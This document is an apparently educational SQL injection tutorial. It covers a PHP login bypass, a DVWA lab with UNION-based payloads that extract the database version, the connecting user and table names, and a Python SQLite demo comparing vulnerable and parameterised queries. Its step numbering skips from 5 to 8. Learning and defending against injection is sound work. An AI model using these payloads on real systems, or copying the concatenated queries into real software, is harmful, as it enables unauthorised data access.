SQL Injection
Process: Let's take a simple scenario where we have a web application with a login form
with username and password fields. If the developer used PHP and built the query by string
concatenation, the code would look like this:
<?php
$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";
$query .= " AND password = '" . $_POST['password'] . "'";
?>
If a user UTKARSH with the password '12345' wanted to log in, after clicking the Submit or the
Log in button, the query sent to the database would look like this:
SELECT * FROM users WHERE username='UTKARSH' AND password='12345'
If an attacker knew the username and wanted to bypass the login window, they would put something
like UTKARSH'; -- in the username field (with a space after the dashes: MySQL only treats -- as a
comment when it is followed by whitespace) and anything at all, here 1111, in the password field.
The resulting SQL query would look like this:
SELECT * FROM users WHERE username='UTKARSH'; -- ' AND password='1111'
What the attacker has done is close the developer's quoted string with a single quote and add the
-- (double-dash), which comments out the rest of the SQL statement. The password comparison never
reaches the database, so the query returns UTKARSH's row whatever was typed in the password field,
and the attacker is logged in as that user. The semicolon adds nothing to the bypass; the quote and
the comment are what matter.
Step 1: Setup DVWA for SQL Injection :- Browse to 127.0.0.1/dvwa/login.php and log in with the
username "admin" and password "password". These are the default DVWA credentials. After a
successful login, set the DVWA Security level to Low, then click SQL Injection in the left-side menu.
Step 2: Basic Injection : In the User ID field, enter "1" and click Submit. This prints the ID,
First name, and Surname of that user on the screen. The query being built behind the form is:
SELECT first_name, last_name FROM users WHERE user_id = '1';
Let's change the id parameter of the URL to 2, 3, 4 and so on. Each value returns the First name
and Surname of one user, as follows:
ID: 2 | First name: Gordon | Surname: Brown
ID: 3 | First name: Hack | Surname: Me
ID: 4 | First name: Pablo | Surname: Picasso
If you were executing this directly on the DVWA database, the query for User ID 3 would look like
this: SELECT first_name, last_name FROM users WHERE user_id = '3';
Step 3: Always True Scenario : A faster way to extract every First name and Surname is to inject a
condition that is always true. Enter the text below in the User ID field:
%' or '1'='1
The percentage % sign on its own matches no user_id, so that comparison is false. '1'='1' is always
true, so the OR makes the WHERE clause true for every row and the whole table is returned. If you
were executing that on the database, the query would look like this:
SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';
Step 4: Display Database Version : To find the database version the DVWA application is running
on, enter the text below in the User ID field.
%' or 0=0 union select null, version() #
The # comments out the closing quote the application appends, and null pads the first column so
the UNION has the same two columns as the original SELECT. The database version is listed under
Surname in the last row, as shown in the image below.
Step 5: Display Database User : To display the database account the PHP application uses to
connect to the database (user@host), enter the text below in the User ID field.
%' or 0=0 union select null, user() #
Step 8: Display the user tables from information_schema : To list every table whose name begins
with "user", enter the text below in the User ID field. Because 1=0 makes the original WHERE clause
false, only the rows from the UNION are shown.
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #
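The whole chain above, the DVWA lookups from Steps 2 to 8 and the login bypass from the Process section, as an added Python example that is not part of the original page or of DVWA. It stands in for the MySQL database with in-memory SQLite, so the payloads are ported: MySQL's # comment becomes --, version() becomes sqlite_version(), and information_schema.tables becomes sqlite_master. The table rows and the user/password values are constructed for this example. Each vulnerable query is shown beside its parameterised form so the same payloads can be seen to fail against it.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table. The column names
# follow the page's queries (user_id, first_name, last_name); the user and
# password values are made up for this example.
USERS = [
    (1, "admin", "admin", "admin", "password"),
    (2, "Gordon", "Brown", "gordonb", "abc123"),
    (3, "Hack", "Me", "1337", "charley"),
    (4, "Pablo", "Picasso", "pablo", "letmein"),
]


def make_db():
    """In-memory SQLite stand-in for the DVWA database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
        "user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The DVWA Low-level query: the raw id parameter is glued into the SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Same lookup with a bound parameter: the input is a value, never SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def login_vulnerable(conn, username, password):
    """The page's PHP login query, concatenated the same way."""
    sql = (f"SELECT * FROM users WHERE user = '{username}'"
           f" AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised login: a quote or comment in the input cannot end the string."""
    sql = "SELECT * FROM users WHERE user = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The page's payloads ported to SQLite: '#' becomes '-- ', version() becomes
# sqlite_version(), information_schema.tables becomes sqlite_master.
ALWAYS_TRUE = "%' or '1'='1"
VERSION = "%' or 0=0 union select null, sqlite_version() -- "
TABLES = ("%' and 1=0 union select null, name from sqlite_master "
          "where name like 'user%' -- ")
LOGIN_BYPASS = "gordonb'-- "


def run_demo():
    """Runs every payload against both query styles and returns the results."""
    conn = make_db()
    return {
        "basic": lookup_vulnerable(conn, "1"),
        "always_true": lookup_vulnerable(conn, ALWAYS_TRUE),
        "version": lookup_vulnerable(conn, VERSION),
        "tables": lookup_vulnerable(conn, TABLES),
        "login_bypass": login_vulnerable(conn, LOGIN_BYPASS, "wrong"),
        # The same inputs against the parameterised queries return nothing.
        "safe_always_true": lookup_safe(conn, ALWAYS_TRUE),
        "safe_login_bypass": login_safe(conn, LOGIN_BYPASS, "wrong"),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result}")
```

The UNION rows arrive with null in the First name column, which is why the version, user and table names appear under Surname in DVWA. Note that the fix is the bound parameter, not escaping: the driver sends the payload as data, so the comment and the closing quote are never parsed as SQL.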